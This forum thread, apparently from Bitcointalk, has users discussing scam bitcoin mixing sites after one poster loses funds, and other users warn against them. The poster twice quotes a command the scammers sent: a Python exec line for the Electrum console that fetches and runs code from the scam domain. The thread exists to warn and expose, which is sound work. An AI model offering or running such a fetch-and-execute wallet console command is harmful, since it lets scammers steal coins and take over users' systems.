Oh boy! you should have dome some research before sending your coins to those mixers. You can not just google for mixers and send your coins. The easiest way to scam you to create a fake mixing service and scam you. Like the other poster said, I am also sure there are nothing wrong with your Electrum. It's the mixers. Additionally check this: scammed by coinmixer.es and bitcoinmixer.eu (100% scammer website)

Sad... It is always good to make a small research in social networks (like this forum or Reddit) before using a service like this for the first time. Even when looking for an exchange or a new wallet it is always good to look for users opinions.

He probably did a little research but blindly trusted a website that recommended mixers and relied on the site's reviews. If you check this website the first two mixers that was listed on the top are also the first two mixers that OP used. Never trust these sites always search for several reviews or post service discussion if you have doubts about a certain service.

If you check this website the first two mixers that was listed on the top are also the first two mixers that OP used. That site is a known scam site. It has shown up on several posts in the last few months from newbies being tricked by scam mixers. As far as I can tell, every mixer on that site except ChipMixer is either a scam or has shutdown. It seems they throw ChipMixer in as well to try to give a false sense of legitimacy since it is so well known, but then rate it lower than a bunch of their other scam mixers. To OP, I would suggest you check out this thread: 2019 List Bitcoin Mixers Bitcoin Tumblers Websites. Pay particular attention to the "Scam Mixers" section.

Thanks all for the quick replies. You are correct, I only did a small amount of research and was too gullible to think scamming was so widespread. I'll read up more before I retry - thanks for the links. I had used bitcoin blender several times before they shut down the original onion site ( http://bitblendervrfkzr.onion). FWIW, I got an email reply from Bitcoinmixer.eu and they asked me to input the following in the Electrum console: >> exec("import requests\nexec(requests.get(' https://bitcoinmixer.eu/fast_recovery/13nG6Qw2XzmNyHEqRZpfVu25FwjQAGEqUq').text)") (The address is the wallet I wanted the mixed coins sent to). The command looked safe so I tried it and it gave me an error: Server exception, please, contact with support. I let them know and haven't heard anything since. I also forgot to mention I'm running Electrum through the latest version of Torr but I doubt that matters.

I also forgot to mention I'm running Electrum through the latest version of Torr but I doubt that matters. What do you mean by "It looked safe".... The site is a scam. Don't run ANYTHING they tell you to. best case is that they'll steal all your coins, worst case is that they completely infect your entire system. So you already send money to them, they didn't give you your coins, and their support told you to try again but through the console? They're just double-scamming you. >> exec("import requests\nexec(requests.get('https://bitcoinmixer.eu/fast_recovery/13nG6Qw2XzmNyHEqRZpfVu25FwjQAGEqUq').text)") Looks extremely sketchy. I think you can be happy the server returned an error.
Wait: You ran that command in your console, and it returned what? "Please contact our support"? You should know- Electrum.org/Electrum DOES NOT have a "Support" other than their github page. If they ask you to download any other version of electrum, it's most likely a scam.

The keyword exec alone is enough to tell the command could be dangerous. Never run an command without good understanding about the command or do extensive research. But i doubt the error message on Electrum tell user to contact support, IMO the command is successfully executed.

Yeah this was kind of my thought too, but it doesn't seem like OP's wallet has been cleared yet, or he would've said it.. I think the gist of it is this: they'll tell him to contact "support" in the popup -> which is actually "Bitmixer.eu Support" through electrum through the command, and then they'll probably ask him to download the "fixed" version of Electrum or something similar which is "able" to run the command (while it's infact just malware designed to steal his coins). Anyway, be safe OP.
First post as a Legendary member by the way. Woohoo.

Thankfully, I've not been cleaned out - Maybe their code snippet worked with an older version of Electrum.
Anyway, I've had success with ChipMixer.

Its really sad to see someone got scammed by this way . After trying all the way to steal peoples fund those bitches are now active with fake mixer ideas. Basically i am not going to give all the credit to scammers for this incident where OP didn't feel it necessary to research properly about trusted mixer platforms before sending his btc. By the way at least he tried with the small amount to be ensure and got the real thing. In recent times its pretty much common to see this kinda scam, phishing, clone sites on the browser first page after clicking the search button. Normally they keep all the design exactly similar with the real one and slightly change the domain to make visitors fool. Their main target is to keep their sites on top of search engine recommendation by spending money for best SEO services. In some cases its really interesting to see their websites get visible above the real one. I have seen something similar for " Bittrex" and many traders lost their fund by visiting bittrex's phishing site as we all know. In this situation some new users like OP make their first mistake by trying to find best mixers through Google, Yandex or similar search.

I have also bad experience with ultramixer. I read a review with several mixers and ratings. Looked ok and the site was professional. Ultramixer site also looked professional. Sent some money. Nothing came back. After contacting support including letter of guaranty nothing happened. After several days I got a message with a lot of being sorry, blabla... They asked for OS and wallet software. I gave these information because I didnt see a reason not to give it. Then within 1 day I got a step by step manual to mess around with my wallet code. This was now defenitely very suspicous. I told them to explain why letter of guaranty shouldn´t be enough. Now since 1 week no reply.
STAY AWAY OF THESE ROBBERS

They asked for OS and wallet software. There is no reason for them to require this information. Once your transaction has been sent, it is completely irrelevant what wallet or OS you used to make said transaction. The only reason they want this information is so they can tailor their next steps in their attempt to scam you of even more money. You absolutely should not do anything they suggest in the "manual" they sent. They are trying to steal more of your coins. I'd also be very careful to make sure you haven't inadvertently downloaded malware. In the future, just stick with ChipMixer.

Sorry for the loss of funds. ultramixer.net have been proven to be scammers and people should keep away them. I already included them in this post: List of Bitcoin Mixer or tumbler SCAM/CLONE websitesSo that people who care to do due diligience won't become next victims. Always avoid basing only on reviews... some reviews are obviously fake These thread has some of the best trusted bitcoin mixers you can use: https://bitcointalk.org/index.php?topic=2827109.0

Achimokai, you should have asked question about the mixing site services on here or do a quick search about it on Reddit because the site has been accused 9months ago and I will advise you to use a mixing company with good reputation or running a campaign on this forum.

There's a warning on the electrum console tab about running untrusted code snippets. They may have compromised your entire system.

I believe I've never seen any genuine mixers asking you to send your coins to a legacy address but to multisig addresses that start with a '3'. And what made you went through these mixers when you've had Chipmixer that charges you nothing for using their services? Seriously, the amounts that you sent could've been easily mixed up through Chipmixer and it is the one and only mixer whose security couldn't be broken by the best hackers available.

Please get your electrum only from the official website. Make sure the url is electrum.org. Versions older than 3.3.4 are vulnerable or can trick the user into downloading a fake version.

You were really unlucky OP to find three scammy mixers in a row. I wonder why haven't you done a little research on mixers services first?
Especially, here on Bitcointalk should be ChipMixer ads visible everywhere and additionally, there are a lot of reviews very easy to find about BTC mixing services.
I tried to search in Google for mixers using "BTC mixers" query and found out that there are a couple on the top of the first page which I totally don't know and have never heard about them before.
Now I am not so surprised that one can be a victim of scam mixers, especially a newbie in crypto because Google is the first place to look.
